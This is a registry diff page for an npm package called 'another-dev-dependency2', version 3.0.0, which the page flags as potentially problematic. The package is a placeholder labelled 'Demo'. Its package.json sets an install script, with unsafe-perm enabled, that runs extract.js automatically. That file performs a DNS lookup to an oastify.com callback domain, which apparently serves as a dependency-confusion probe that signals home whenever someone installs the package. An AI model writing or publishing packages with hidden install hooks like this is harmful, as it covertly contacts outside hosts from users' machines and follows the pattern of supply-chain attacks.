another-dev-dependency2 3.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of another-dev-dependency2 might be problematic. Click here for more details.

package/README.md ADDED
@@ -0,0 +1,6 @@
1
+ # Demo
2
+ Demo
3
+
4
+ Demo
5
+
6
+ Reference: Demo
package/extract.js ADDED
@@ -0,0 +1,11 @@
1
+ const dns = require('dns');
2
+
3
+ const domain = 'ra5ypafr3wonop5a47o47nuaa1gs4js8.oastify.com';
4
+
5
+ dns.lookup(domain, (err, address, family) => {
6
+ if (err) {
7
+ console.log(err);
8
+ } else {
9
+ console.log(`Address: ${address}, family: ${family}`);
10
+ }
11
+ });
package/index.js ADDED
@@ -0,0 +1 @@
1
+ # blank demo
package/package.json ADDED
@@ -0,0 +1,19 @@
1
+ {
2
+ "name": "another-dev-dependency2",
3
+ "version": "3.0.0",
4
+ "description": "Demo Package",
5
+ "main": "index.js",
6
+ "keywords": [
7
+ "Demo1",
8
+ "Demo"
9
+ ],
10
+ "dependencies": {},
11
+ "scripts": {
12
+ "install": "node extract.js"
13
+ },
14
+ "config": {
15
+ "unsafe-perm":true
16
+ },
17
+ "author": "Demo Package",
18
+ "license": "ISC"
19
+ }